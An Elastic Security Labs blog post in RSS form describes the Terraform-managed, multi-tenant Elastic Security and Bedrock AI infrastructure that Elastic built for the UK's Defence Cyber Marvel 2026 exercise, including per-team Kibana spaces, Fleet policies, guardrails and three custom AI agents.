<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
    <channel>
        <title>Elastic Security Labs - Enablement</title>
        <link>https://www.elastic.co/kr/security-labs</link>
        <description>Trusted security news &amp; research from the team at Elastic.</description>
        <lastBuildDate>Thu, 09 Apr 2026 18:35:00 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>https://github.com/jpmonette/feed</generator>
        <image>
            <title>Elastic Security Labs - Enablement</title>
            <url>https://www.elastic.co/kr/security-labs/assets/security-labs-thumbnail.png</url>
            <link>https://www.elastic.co/kr/security-labs</link>
        </image>
        <copyright>© 2026 Elasticsearch B.V. All Rights Reserved</copyright>
        <item>
            <title><![CDATA[Elastic on Defence Cyber Marvel 2026: A Technical Overview from the Exercise Floor]]></title>
            <link>https://www.elastic.co/kr/security-labs/elastic-defence-cyber-marvel</link>
            <guid>elastic-defence-cyber-marvel</guid>
            <pubDate>Thu, 09 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[An overview of the Elastic Security and AI infrastructure deployed to support the UK Ministry of Defence's flagship cyber exercise, Defence Cyber Marvel 2026.]]></description>
            <content:encoded><![CDATA[<p><img src="https://www.elastic.co/kr/security-labs/assets/images/elastic-defence-cyber-marvel/image1.png" alt="" /></p>
<p>Where to begin. For the fourth consecutive year, Elastic has had the privilege of serving as a trusted industry partner on Exercise Defence Cyber Marvel - the UK Ministry of Defence's flagship cyber exercise series. DCM26 was, without question, the most ambitious iteration yet, and we're chuffed to bits to finally be able to talk about what we built, how we built it, and what we learnt along the way.</p>
<h2>What is Defence Cyber Marvel?</h2>
<p>For those unfamiliar, Defence Cyber Marvel (DCM) is the largest UK military cyber exercise series that focuses on defending traditional IT networks, corporate environments, and complex industrial control systems in realistic, high-pressure scenarios. It showcases responsible cyber power whilst enhancing readiness, interoperability, and resilience across Defence and allied nations. Now in its fifth year, DCM has evolved from an Army Cyber Association initiative into a tri-service operation led by Cyber and Specialist Operations Command (CSOC).</p>
<p>The <a href="https://www.gov.uk/government/news/uk-to-lead-multinational-cyber-defence-exercise-from-singapore">UK Government published an official press release for DCM26</a>, which provides an excellent overview of the exercise's strategic importance. As the British High Commissioner to Singapore noted, the exercise demonstrates the deep cooperation between the UK and trusted partners, a reminder of the strength of shared strategic partnerships in an increasingly complex security landscape.</p>
<p>At its core, DCM is a force-on-force cyber exercise: defending Blue Teams protect their assigned networks and infrastructure from attacking Red Teams, using a range of techniques. Activities span changing default passwords and hardening firewalls through to deploying enterprise-grade, AI-powered cyber defence with <a href="https://www.elastic.co/kr/security">Elastic Security</a>. The activities of each team are monitored by the White Team to establish a score factoring in system availability, attack detection, incident reporting, and system restoration. It stretches the most experienced teams whilst also providing a unique training mechanism for junior teams on their first exposure to a cyber range, and that dual purpose is what makes DCM such a valuable exercise.</p>
<h2>The scale of DCM26</h2>
<p>DCM26 brought together over 2,500 personnel from 29 participating countries and 70 organisations, coordinated from a central Exercise Control (EXCON) based out of Singapore, with EXCON hosting over 600 participants. The exercise ran across a hybrid compute environment spanning the CR14 cyber range and AWS, hosting over 5,000 virtual systems.</p>
<p>The exercise itself ran for five days of execution (9–13 February 2026), preceded by optional instructor-led pre-training and connectivity checks. The scenario, built on the Defence Academy Training Environment (DATE) Indo-Pacific Operating Environment, placed teams as Cyber Protection Teams defending deployed military systems during an escalating regional crisis. Blue Teams were geographically dispersed: some in their home locations across the UK and internationally, others deployed overseas, all connecting into the range via VPN.</p>
<p>Participants included representatives from UK Defence, cross-government departments such as the National Crime Agency, the Department for Work and Pensions, the Cabinet Office, and the Department for Business and Trade, alongside international partners forming up to 40 teams. Following the success of last year's exercise in the Republic of Korea, Singapore served as the exercise hub for the first time, reflecting the UK's commitment to deepening cooperation with Indo-Pacific partners on shared security challenges.</p>
<p>In short, it's a serious exercise. High-pressure, force-on-force, with real consequences for scoring and real learning outcomes for every participant.</p>
<h2>The deployments: Our Elastic infrastructure</h2>
<p>This year's infrastructure represented a significant architectural evolution from previous iterations. Rather than deploying individual Elastic Cloud clusters per team, we moved to a single, space-based multi-tenanted Elastic Cloud deployment for the Blue Teams. We also provided deployments for functions outside of the Blue Teams. Let me break down each deployment and why it exists.</p>
<h3>Blue Teams: Multi-tenanted Elastic Security</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/elastic-defence-cyber-marvel/image4.png" alt="" /></p>
<p>The centrepiece of our contribution was a single Elastic Cloud deployment serving all 40 defending Blue Teams, separated using Kibana Spaces and datastream namespaces. Each team had its own isolated workspace, including dashboards, agents, and detection rules.</p>
<p>Here's what the Terraform resource looked like for creating each team's space:</p>
<pre><code># Create 40 Blue Team spaces
resource &quot;elasticstack_kibana_space&quot; &quot;blue_team&quot; {
  count = var.team_count

  space_id    = local.space_ids[count.index]
  name        = &quot;Blue Team ${local.team_numbers[count.index]}&quot;
  description = &quot;Isolated space for BT-${local.team_numbers[count.index]} with space-aware Fleet visibility&quot;

  disabled_features = []
  color             = &quot;#0077CC&quot;
}
</code></pre>
<p>Each team's space got a dedicated set of three <a href="https://www.elastic.co/kr/docs/reference/fleet/agent-policy">Fleet</a> agent policies: a Deployed network policy on day one, a Host Nation network policy on day two, and a PacketCapture policy for network traffic monitoring. The phased access control was elegant in its simplicity: setting <code>enable_hostnation_network = true</code> in our <code>terraform.tfvars</code> and running <code>terraform apply</code> expanded each team's role permissions and made their Host Nation agent policy visible in their space. The exercise went from one network to two without a single manual click in Kibana.</p>
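<p>For illustration, the feature flag behind that phased rollout can be a single boolean variable; a minimal sketch (the variable declaration and description shown here are assumed, matching the <code>terraform.tfvars</code> reference above):</p>
<pre><code># variables.tf - feature flag for the day-two Host Nation network (illustrative)
variable &quot;enable_hostnation_network&quot; {
  description = &quot;When true, expands Blue Team roles and reveals the Host Nation agent policy&quot;
  type        = bool
  default     = false
}

# terraform.tfvars - flipped on day two, followed by a `terraform apply`
enable_hostnation_network = true
</code></pre>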
<p>The data isolation relied on datastream namespaces. Each agent policy wrote to team-specific namespaces like <code>bt_01_deployed</code> and <code>bt_01_hostnation</code>, producing data streams following the pattern:</p>
<pre><code>logs-system.auth-bt_01_hostnation
logs-system.syslog-bt_01_hostnation
metrics-system.cpu-bt_01_hostnation
logs-endpoint.events.process-bt_01_hostnation
logs-windows.forwarded-bt_01_hostnation
logs-auditd.log-bt_01_hostnation
</code></pre>
<p>Each team's Kibana security role was then scoped to only those data streams using dynamic index privilege blocks:</p>
<pre><code># Deployed data streams (always granted)
indices {
  names = [
    &quot;logs-*-${local.deployed_namespaces[count.index]}&quot;,
    &quot;metrics-*-${local.deployed_namespaces[count.index]}&quot;,
    &quot;.fleet-*&quot;
  ]
  privileges = [&quot;read&quot;, &quot;view_index_metadata&quot;]
}

# HostNation data streams (conditional on enable_hostnation_network)
dynamic &quot;indices&quot; {
  for_each = var.enable_hostnation_network ? [1] : []
  content {
    names = [
      &quot;logs-*-${local.hostnation_namespaces[count.index]}&quot;,
      &quot;metrics-*-${local.hostnation_namespaces[count.index]}&quot;
    ]
    privileges = [&quot;read&quot;, &quot;view_index_metadata&quot;]
  }
}
</code></pre>
<p>Authentication was handled via Keycloak SSO, with Elasticsearch role mappings connecting Keycloak groups to Kibana roles:</p>
<pre><code>resource &quot;elasticstack_elasticsearch_security_role_mapping&quot; &quot;blue_team&quot; {
  count = var.team_count

  name    = &quot;bt-${local.team_numbers[count.index]}-keycloak-mapping&quot;
  enabled = true

  roles = [
    elasticstack_kibana_security_role.blue_team[count.index].name
  ]

  rules = jsonencode({
    field = {
      groups = &quot;${local.keycloak_groups[count.index]}&quot;
    }
  })
}
</code></pre>
<p>The default integration policies were simple by design. Each team received: System for core OS telemetry, Elastic Defend for Endpoint Detection and Response, Windows event forwarding, Auditd for Linux audit logging, and Network Packet Capture integrations. That's over 400 integration policies managed as code via the <a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">Elastic Stack Terraform Provider</a>.</p>
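<p>To give a sense of what those integrations-as-code look like, here is a hedged sketch of a single System integration policy using the provider's <code>elasticstack_fleet_integration_policy</code> resource (the referenced agent policy resource, the locals, and the pinned version are assumptions, not our exact configuration):</p>
<pre><code># One of the 400+ integration policies - System telemetry on a team's Deployed network
resource &quot;elasticstack_fleet_integration_policy&quot; &quot;system_deployed&quot; {
  count = var.team_count

  name                = &quot;system-bt-${local.team_numbers[count.index]}-deployed&quot;
  namespace           = local.deployed_namespaces[count.index]
  agent_policy_id     = elasticstack_fleet_agent_policy.deployed[count.index].policy_id
  integration_name    = &quot;system&quot;
  integration_version = &quot;1.60.0&quot; # illustrative version
}
</code></pre>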
<p>A note on Elastic Defend: due to the effectiveness of Elastic's endpoint protection - which is trusted in production by the <a href="https://www.elastic.co/kr/blog/defense-and-intelligence-community-endpoint-security">US DOD and IC, read more about that here</a> - and the fact that nobody in their right mind is burning zero-day exploits on a training exercise, we were forced to handicap Elastic Defend by disabling Prevent mode, leaving it in Detect-only mode. Teams got alerts when something malicious happened, but with no automatic mitigation. We also completely disabled Memory Threat Prevention and Detection, as this discovers the majority of attacking team implants and beacons, which would rather spoil the game for the Red Teams. Toward the end of the exercise, we allowed the teams the freedom to use Elastic Defend to its full capability, but not before letting the Red Teams get a strong foothold.</p>
<p>We also pre-installed Elastic's <a href="https://www.elastic.co/kr/docs/reference/security/prebuilt-rules">prebuilt detection rules</a> into each team space - the full set from Elastic Security Labs, continuously updated in an open repository. These rules were set up to ensure they queried only the indices that the team's namespace-scoped permissions allowed, preventing any cross-team data leakage in detection rule execution.</p>
<p>Additionally, each team space had its Security Solution default index configured to scope detection rules to only that team's data streams, rather than the default broad pattern. This was handled by a Terraform <code>null_resource</code> that called the Kibana internal settings API to set <code>securitySolution:defaultIndex</code> for each space.</p>
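<p>Since the provider has no first-class resource for space-level advanced settings, a <code>null_resource</code> with a <code>local-exec</code> provisioner can call the settings endpoint directly. A sketch of that pattern (the credential environment variables and locals here are assumptions; the endpoint shape follows Kibana's internal settings API):</p>
<pre><code>resource &quot;null_resource&quot; &quot;security_default_index&quot; {
  count = var.team_count

  provisioner &quot;local-exec&quot; {
    command = &lt;&lt;-EOT
      curl -s -X POST &quot;${var.kibana_url}/s/${local.space_ids[count.index]}/api/kibana/settings&quot; \
        -H &quot;kbn-xsrf: true&quot; -H &quot;Content-Type: application/json&quot; \
        -u &quot;$KIBANA_USER:$KIBANA_PASS&quot; \
        -d '{&quot;changes&quot;:{&quot;securitySolution:defaultIndex&quot;:[&quot;logs-*-${local.deployed_namespaces[count.index]}&quot;]}}'
    EOT
  }
}
</code></pre>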
<p>At peak, this deployment was ingesting 800,000 events per second (EPS) across all 40 teams. That's a serious amount of data, and the cluster handled it comfortably thanks to the autoscaling capabilities of Elastic Cloud. <a href="https://www.elastic.co/kr/blog/monitoring-petabytes-of-logs-at-ebay-with-beats">For perspective, back in 2018 we were doing 5 million events per second with eBay.</a></p>
<p>Data lifecycle was managed by an Index Lifecycle Management (ILM) policy that rolled indices over after one day or 50 GB (whichever came first), moved them to a warm phase after two days for read-only optimisation and force-merging, and then deleted data after ten days. As a result, storage costs were minimised whilst meeting the exercise's retention requirements. Below is an example of how the ILM policy was implemented.</p>
<pre><code>resource &quot;elasticstack_elasticsearch_index_lifecycle&quot; &quot;dcm5_10day_retention&quot; {
  name = &quot;dcm5-10day-retention&quot;

  hot {
    min_age = &quot;0ms&quot;

    set_priority {
      priority = 100
    }

    rollover {
      max_age                = &quot;1d&quot;
      max_primary_shard_size = &quot;50gb&quot;
    }
  }

  warm {
    min_age = &quot;2d&quot;

    set_priority {
      priority = 50
    }

    readonly {}

    forcemerge {
      max_num_segments = 1
    }
  }

  delete {
    min_age = &quot;${var.data_retention_days}d&quot;

    delete {
      delete_searchable_snapshot = true
    }
  }
}
</code></pre>
<h3>The shard stress test: Proving multi-tenancy at scale</h3>
<p>Before committing to this architecture for a live military exercise, we needed to prove it would be able to meet our requirements and have an appropriate failover in place in the event of issues. Moving from individual deployments to a single multi-tenanted cluster introduced real risks: resource contention, ingest bottlenecks, data leakage across spaces due to misconfiguration, large TCP connection counts on the Elasticsearch nodes, and a significantly larger shard count since each team generates its own set of indices.</p>
<p>So we built a dedicated testing rig. The plan was straightforward: deploy 50 Kibana Spaces, create an agent policy in each space, launch 6,000 EC2 instances (120 per tenant, across six subnets in three availability zones), and load-test the lot. We monitored everything with AutoOps and Stack Monitoring.</p>
<p>The deployment flow worked like this: Terraform created the VPC and subnets across three availability zones, provisioned the 50 Kibana Spaces and their space-scoped Fleet policies, generated enrolment tokens, and then launched EC2 instances in batches. Each instance installed Elastic Agent on boot and enrolled against its space-specific token.</p>
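<p>The per-instance bootstrap can be sketched as an <code>aws_instance</code> with a user-data script that installs and enrols Elastic Agent on first boot (the AMI, stack version variable, and token lookup here are assumptions, not our exact rig):</p>
<pre><code>resource &quot;aws_instance&quot; &quot;load_test&quot; {
  count         = var.instances_per_batch
  ami           = var.agent_ami_id
  instance_type = &quot;t3.small&quot;
  subnet_id     = element(var.subnet_ids, count.index % length(var.subnet_ids))

  user_data = &lt;&lt;-EOT
    #!/bin/bash
    # Install Elastic Agent and enrol against this tenant's space-scoped policy
    curl -sL -O https://artifacts.elastic.co/downloads/beats/elastic-agent/elastic-agent-${var.stack_version}-linux-x86_64.tar.gz
    tar xzf elastic-agent-${var.stack_version}-linux-x86_64.tar.gz
    cd elastic-agent-${var.stack_version}-linux-x86_64
    ./elastic-agent install --non-interactive \
      --url=${var.fleet_url} \
      --enrollment-token=${var.enrolment_tokens[count.index % var.tenant_count]}
  EOT
}
</code></pre>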
<p>We hit some interesting challenges along the way. The standard Elastic Stack Terraform Provider didn't support space-aware Fleet operations at the time, so we forked it and added space ID handling to the Fleet resources - without that modification, every agent would have enrolled into the default space regardless of policy assignment. This wasn't the first time we'd had to extend the provider for an exercise; two years ago, for DCM2, we'd added the <code>elasticsearch_cluster_info</code> data source. Fortunately, the upstream provider has since added support for <code>space_ids</code> in version <code>0.12.2</code>.</p>
<p>We also ran into AWS EC2 API rate limits when trying to spin up all 6,000 instances simultaneously, so we batched deployments at 500 instances with five-minute cool-off periods between batches.</p>
<p>The results were reassuring. All 6,000 agents were typically enrolled within 20 minutes of deployment. In our tests, space isolation worked as expected with no observed data leakage between tenants. Fleet policy updates propagated to all agents within 60 seconds. Search queries scoped to individual spaces remained fast under full load. And the multi-AZ distribution proved resilient during simulated availability zone failures.</p>
<p>This testing gave us the confidence to commit to the architecture for the live exercise.</p>
<h3>Red Teams: C2 implant observability</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/elastic-defence-cyber-marvel/image3.png" alt="" /></p>
<p>A separate, dedicated Elastic deployment was stood up for the Red Teams, focused on Command and Control (C2) implant observability. This gave the attacking teams visibility into their own operations, including implant status, beacon callbacks, and operational progress, without any risk of cross-pollination with the Blue Team's data. The Red Teams used Tuoni as their C2, which is a framework developed by Clarified Security for red teaming. In DCM3, we worked with Clarified Security to ensure it properly supported the Elastic Common Schema, making future integration with Elastic much easier.</p>
<h3>NSOC: Exercise Network Security Operations Centre</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/elastic-defence-cyber-marvel/image6.png" alt="" /></p>
<p>The exercise's core Network Security Operations Centre (NSOC) ran on its own Elastic deployment, providing the exercise control staff with an overarching view of range health, security monitoring across the entire infrastructure, and, critically, audit logging for all the AI services we deployed. Every <a href="https://www.elastic.co/kr/docs/reference/integrations/aws_bedrock">Bedrock API invocation was logged in CloudWatch</a> and observable in this deployment, meaning the NSOC had complete visibility into what was being asked of the AI agents, and by whom. More on this in the AI section below.</p>
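<p>For reference, enabling that account-level Bedrock invocation logging is itself a small piece of Terraform; a hedged sketch (the log group name and IAM role are assumptions):</p>
<pre><code>resource &quot;aws_bedrock_model_invocation_logging_configuration&quot; &quot;dcm5&quot; {
  logging_config {
    text_data_delivery_enabled      = true
    embedding_data_delivery_enabled = true

    cloudwatch_config {
      log_group_name = &quot;/aws/bedrock/dcm5-invocations&quot;
      role_arn       = aws_iam_role.bedrock_logging.arn
    }
  }
}
</code></pre>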
<h2>Infrastructure automation: Terraform and Catapult</h2>
<p>Everything you've seen above was managed as Infrastructure as Code. Our <code>provider.tf</code> gives a sense of the provider ecosystem we were orchestrating:</p>
<pre><code>terraform {
  required_version = &quot;&gt;= 1.5&quot;

  required_providers {
    elasticstack = {
      source  = &quot;elastic/elasticstack&quot;
      version = &quot;~&gt; 0.13.1&quot;
    }
    aws = {
      source  = &quot;hashicorp/aws&quot;
      version = &quot;~&gt; 5.0&quot;
    }
    vault = {
      source  = &quot;hashicorp/vault&quot;
      version = &quot;~&gt; 3.20&quot;
    }
    cloudflare = {
      source  = &quot;cloudflare/cloudflare&quot;
      version = &quot;~&gt; 5.15.0&quot;
    }
  }

  backend &quot;s3&quot; {
    bucket  = &quot;elastic-terraform-state-dcm5&quot;
    key     = &quot;prod/terraform.tfstate&quot;
    region  = &quot;eu-west-2&quot;
    encrypt = true
  }
}
</code></pre>
<p>The total resource footprint managed by Terraform was substantial: one Elastic Cloud deployment with autoscaling, 40 Kibana Spaces, 120 Fleet agent policies (three per team), 400+ integration policies, 40 Kibana security roles, 40 Keycloak role mappings, ILM policies for data retention, 41 AWS IAM users for Bedrock GenAI connectors (one per team space plus a default), 41 Kibana GenAI action connectors, AWS Bedrock guardrails, Cloudflare Zero Trust tunnels for Tines access, Tines action connectors per team space, detection service accounts stored in HashiCorp Vault, and per-space Security Solution default index configuration. All state was stored in an encrypted S3 backend.</p>
<p>For the agent and proxy deployment onto the actual range systems, we used <a href="https://github.com/ClarifiedSecurity/catapult">Catapult</a>, an excellent open-source tool built by the team at Clarified Security. Catapult wraps Ansible with a container-based execution model that's purpose-built for cyber range deployments. It handled the installation and enrolment of Elastic Agents across the range infrastructure, the configuration of proxy servers (each team had a dedicated Squid proxy for its deployed network to simulate a single point of egress, as it would be in the real world; traffic was routed through endpoints like <code>http://elastic-proxy.dsoc.XX.dcm.ex:3128</code>), and the deployment of Cloudflare tunnels for Tines connectivity.</p>
<p>During provisioning, the following were written to HashiCorp Vault by Terraform and consumed by Catapult: credentials, enrolment tokens, API keys, proxy configurations, and Tines service account credentials. The Vault paths followed a consistent structure like <code>dcm/gt/elastic/prod/enrollment_tokens/BT-XX-Deployed</code> and <code>dcm/gt/elastic/tines-sa/tines-sa-btXX</code>, making it straightforward for the Catapult playbooks to pull the right credentials for each team.</p>
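<p>The Terraform side of that handover is a straightforward KV write per team; a sketch using <code>vault_kv_secret_v2</code> (the local holding the token value is an assumption - in practice it came from the Fleet enrolment token provisioning):</p>
<pre><code>resource &quot;vault_kv_secret_v2&quot; &quot;enrolment_token_deployed&quot; {
  count = var.team_count

  mount = &quot;dcm&quot;
  name  = &quot;gt/elastic/prod/enrollment_tokens/BT-${local.team_numbers[count.index]}-Deployed&quot;

  data_json = jsonencode({
    token = local.deployed_enrolment_tokens[count.index]
  })
}
</code></pre>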
<h2>Training: setting teams up for success</h2>
<p>Deploying the platform is one thing; ensuring people can actually use it is another. We provided on-range, instructor-led training to the Blue Teams during the pre-exercise phase. This covered <a href="https://www.elastic.co/kr/security">Elastic Security</a> fundamentals, navigating their team space in Kibana, working with the prebuilt detection rules, using Discover for log analysis and threat hunting, building custom dashboards, understanding Elastic Defend alerts, and getting familiar with the Timeline investigation tool.</p>
<p>The exercise instruction itself noted this training was optional but &quot;highly recommended,&quot; and from what we saw, the teams who attended absolutely hit the ground running on day one of execution. Training and enablement are just as important as the technology deployment itself. Handing a team enterprise-grade security tooling that they don't know how to use wouldn't have been helpful for anyone.</p>
<h2>The on-range AI service: Compliant, audited, and guardrailed</h2>
<p>This year marked our debut in providing AI access to the DCM range. We provided a compliant AI service directly on the range, backed by UK-tenanted AWS Bedrock models - specifically Claude 3.7 Sonnet running in the eu-west-2 (London) region. This wasn't AI for the sake of AI; it was a carefully architected service with guardrails, complete audit logging, and RBAC-aware access controls. We were trusted with running this service due to Elastic's experience in the AI space.</p>
<p>The AI service had multiple consumers on the range, and this is an important distinction. The compliant Bedrock connector we provisioned into each team's space wasn't just powering our custom agents - it also powered Elastic's native AI features, specifically:</p>
<h3>Elastic AI Assistant for Security</h3>
<p>The <a href="https://www.elastic.co/kr/docs/solutions/security/ai/ai-assistant">Elastic AI Assistant</a> was available in every Blue Team space, connected to our on-range Bedrock connector. This gave teams a context-aware chat interface directly within Elastic Security where they could ask questions about their alerts, get help writing ES|QL queries, investigate suspicious processes, and get guided remediation steps. The AI Assistant uses Retrieval-Augmented Generation (RAG) with Elastic's Knowledge Base feature, which is pre-populated with articles from <a href="https://www.elastic.co/kr/security-labs">Elastic Security Labs</a>. Teams could also add their own documents, such as range-specific SOPs, threat intel, or team notes, to the Knowledge Base to further ground the assistant's responses in their operational context.</p>
<p>What made this particularly valuable in the exercise context was the AI Assistant's ability to help less experienced analysts understand what they were looking at. A junior analyst facing their first live implant beacon could ask the assistant to explain the alert, suggest investigation steps, and even help draft the incident report. The data anonymisation settings ensured that sensitive field values could be obfuscated before being sent to the LLM provider.</p>
<h3>Elastic Attack Discovery</h3>
<p><a href="https://www.elastic.co/kr/docs/solutions/security/ai/attack-discovery">Attack Discovery</a> was another significant consumer of our on-range AI service. Attack Discovery uses LLMs to analyse alerts in a team's environment and identify threats by correlating alerts, behaviours, and attack paths. Each &quot;discovery&quot; represents a potential attack and describes relationships among multiple alerts - telling teams which users and hosts are involved, how alerts map to the <a href="https://www.elastic.co/kr/docs/solutions/security/detect-and-alert/mitre-attack-coverage">MITRE ATT&amp;CK matrix</a>, and which threat actor might be responsible.</p>
<p>For a cyber exercise in which Red Teams actively launched coordinated attacks, Attack Discovery was transformative. Instead of manually triaging hundreds of individual alerts, Blue Teams could run Attack Discovery to surface the high-level attack narratives, for example, &quot;these 15 alerts are all part of a lateral movement chain from host X to host Y, likely by threat actor Z&quot;, and focus their investigation time where it mattered most. It's the kind of capability that directly reduces mean time to respond, and fights alert fatigue, which is precisely what you need when you're under sustained attack for five days straight.</p>
<h2>The custom AI agents: Elastic Agent Builder</h2>
<p>Beyond the native Elastic AI features, we built three bespoke AI agents using <a href="https://www.elastic.co/kr/elasticsearch/agent-builder">Elastic Agent Builder</a>. Agent Builder is Elastic's framework for building custom AI agents that combine LLM instructions with modular, reusable tools, each tool being an ES|QL query, a built-in search capability, workflow execution, or an external integration via MCP. Agents parse natural language requests, select the appropriate tools, execute them, and iterate until they can provide a complete answer, all while managing context with data inside Elasticsearch. You can read more about the framework in the <a href="https://www.elastic.co/kr/docs/explore-analyze/ai-features/elastic-agent-builder">Agent Builder documentation</a> and the <a href="https://www.elastic.co/kr/search-labs/blog/elastic-ai-agent-builder-context-engineering-introduction">Elasticsearch Labs deep dive</a>.</p>
<p>The three key components of Agent Builder that we leveraged were:</p>
<p><strong>Agents:</strong> Custom LLM instructions and a set of assigned tools that define the agent's persona, capabilities, and behaviour boundaries. Each agent has a system prompt that controls its mission, the tools it can access, and the structure of its responses.</p>
<p><strong>Tools:</strong> Modular functions that agents use to search, retrieve, and manipulate Elasticsearch data. We built custom ES|QL tools that queried specific indices containing exercise documentation, playbooks, and reports.</p>
<p><strong>Agent Chat:</strong> The conversational interface - both the built-in Kibana UI and the programmatic API - that participants used to interact with the agents.</p>
<p>Agent and tool configurations are defined as JSON and managed via the Agent Builder APIs, making the entire agent lifecycle - from prompt engineering to tool binding - reproducible and version-controllable. We'll share the GrantPT agent configuration and tool definitions in a follow-up post for those who want to replicate this approach - watch this space.</p>
<p>Here's what each agent did:</p>
<h3>1. GrantPT - The general-purpose assistant</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/elastic-defence-cyber-marvel/image5.png" alt="" /></p>
<p>Available to all ~2,500 exercise participants, GrantPT was our primary AI agent and the best demonstration of how straightforward Agent Builder makes it to stand up a capable, domain-specific assistant. The agent's configuration consisted of a JSON object defining its system prompt, persona, and an array of bound tool IDs - that's it. No custom application code, no bespoke API layer, just declarative configuration.</p>
<p>What gave GrantPT its depth was the tooling. We defined a mix of built-in platform tools and custom ES|QL tools, each registered with a description, a parameterised query, and typed parameter definitions. For example, the knowledge base tool accepted a <code>target_index</code> and a semantic <code>query</code> parameter, executing a parameterised ES|QL query against our <code>dcm5-grantpt-*</code> indices with semantic search ranking:</p>
<pre><code>FROM dcm5-grantpt-* METADATA _score, _index
| WHERE _index == ?target_index
| WHERE content: ?query
| SORT _score DESC
| LIMIT 10
</code></pre>
<p>A separate index discovery tool let the agent dynamically enumerate available knowledge base indices at the start of each conversation, meaning we could add new documentation indices during the exercise without reconfiguring the agent; it would simply discover them on the next interaction.</p>
<p>We also built a Jira integration tool that performed semantic search across ingested helpdesk tickets, enabling GrantPT to surface relevant troubleshooting context from prior support requests. This was particularly useful for the HelpDesk Analysts, who could ask GrantPT about recurring issues and get responses grounded in actual ticket history rather than generic guidance.</p>
<p>The RBAC-tailored response behaviour came from a combination of the agent's system prompt, which instructed it to contextualise answers based on the user's role, and the underlying Elasticsearch security model. Because each tool's ES|QL query is executed within the user's security context, the agent can only surface documents accessible to the user's role. A Blue Team member asking about exercise procedures would get results scoped to their team's accessible indices, whilst a HelpDesk Analyst would see results from helpdesk-specific indices. The agent didn't need explicit role-switching logic; Elasticsearch's native document-level security handled scoping, and the agent simply worked with whatever results were returned. This is one of the things that makes Agent Builder genuinely elegant - by inheriting Elasticsearch's security model, you get RBAC-aware AI without writing a single line of authorisation code.</p>
<h3>2. REDRock - The adversary's companion</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/elastic-defence-cyber-marvel/image7.png" alt="" /></p>
<p>This agent was exclusively available to Red Teams. REDRock followed the same Agent Builder pattern, a dedicated system prompt defining its adversarial persona, bound to its own set of custom ES|QL tools querying Red Team-specific indices. These indices contained the Red Team playbooks, Tuoni C2 documentation, known system vulnerabilities within the range environment, and information about deployed services. The tool definitions mirrored the same parameterised semantic search pattern used by GrantPT, but were scoped to indices accessible only to Red Team roles. Red Team operators could query attack vectors, check for known weaknesses in target systems, and get contextual guidance on their operational plans. It was, quite frankly, like giving the attackers an extremely well-briefed operations officer.</p>
<h3>3. RefPT - The referee's tool</h3>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/elastic-defence-cyber-marvel/image2.png" alt="" /></p>
<p>Built specifically for the White Team (the exercise referees and assessors), RefPT was bound to tools querying indices containing Blue Team reports, scenario events, and the scoring criteria. Its purpose was to ensure uniform and fair scoring across all 40+ teams. The agent's system prompt was tuned to cross-reference submitted reports against known scenario events and scoring rubrics, helping assessors identify inconsistencies or gaps. When you've got assessors evaluating dozens of teams simultaneously, having an AI that can correlate reports against a structured scoring index is genuinely transformative for consistency.</p>
<h3>Tines: AI-powered workflow automation</h3>
<p>Tines was also a consumer of the on-range AI service. Each Blue Team had a dedicated Tines instance, with Tines action connectors provisioned in their Kibana space. Tines could leverage the Bedrock-backed AI capabilities for intelligent workflow automation, such as automated alert enrichment, AI-assisted triage decisions, natural-language summaries in notification workflows, and natural-language workflow creation. The Tines connector was configured per-team with credentials stored in Vault:</p>
<pre><code>resource &quot;elasticstack_kibana_action_connector&quot; &quot;tines_bt&quot; {
  count = var.team_count

  name              = &quot;BT-${local.team_numbers[count.index]}-Tines&quot;
  connector_type_id = &quot;.tines&quot;
  space_id          = local.space_ids[count.index]

  config = jsonencode({
    url = &quot;https://tines.dsoc.${local.team_numbers[count.index]}.dcm.ex/&quot;
  })
}
</code></pre>
<h3>Ensuring compliance: Guardrails and audit</h3>
<p>Every AI interaction across all of these consumers was governed by strict AWS Bedrock Guardrails. We deployed guardrails with content filtering (hate, insults, sexual content, and violence at MEDIUM thresholds), PII protection (blocking email addresses, phone numbers, names, addresses, UK National Insurance numbers, credit card numbers, and IP addresses), topic-based filtering to prevent discussion of actual classified operations, and profanity filtering. Here's a snippet of the guardrail configuration from our Terraform:</p>
<pre><code>resource &quot;aws_bedrock_guardrail&quot; &quot;dcm5_elastic&quot; {
  name        = &quot;dcm5-prod-elastic-guardrail&quot;
  description = &quot;Guardrails for DCM5 Prod Elastic Kibana GenAI connectors&quot;

  content_policy_config {
    filters_config {
      input_strength  = &quot;MEDIUM&quot;
      output_strength = &quot;MEDIUM&quot;
      type            = &quot;HATE&quot;
    }
    # ... additional content filters for INSULTS, SEXUAL, VIOLENCE
  }

  sensitive_information_policy_config {
    pii_entities_config {
      action = &quot;BLOCK&quot;
      type   = &quot;UK_NATIONAL_INSURANCE_NUMBER&quot;
    }
    pii_entities_config {
      action = &quot;BLOCK&quot;
      type   = &quot;IP_ADDRESS&quot;
    }
    # ... additional PII filters
  }

  topic_policy_config {
    topics_config {
      name       = &quot;classified-information&quot;
      definition = &quot;Discussions about actual classified operations, current real-world military activities, or operational intelligence.&quot;
      type       = &quot;DENY&quot;
    }
  }
}
</code></pre>
<p>Each Blue Team space had its own IAM user for Bedrock access, and the <code>genAiSettings:defaultAIConnectorOnly</code> Kibana setting was enforced to prevent teams from configuring their own connectors. This meant every single API call could be traced back to a specific team via CloudWatch, and the NSOC had complete audit visibility. The CloudWatch log group <code>/aws/bedrock/grantpt-prod/invocations</code> captured every invocation and guardrail event.</p>
<p>The numbers for all AI consumers speak for themselves: 3 custom AI Agents, 2,797 conversations, and 785 million AI tokens consumed throughout the exercise.</p>
<h2>In-game real-time monitoring</h2>
<p>Within the exercise scenario, each team had access to RocketChat as their on-range messaging client. Every Blue Team got its own channel, the ability to direct message anyone in the exercise, and the freedom to spin up new channels as needed. Most critically for DCM tradition, this included the memes channel - the spiritual backbone of all inter-team ribbing and the creative morale-boosting humour that inevitably emerges when you put a few thousand cyber operators under pressure for a week.</p>
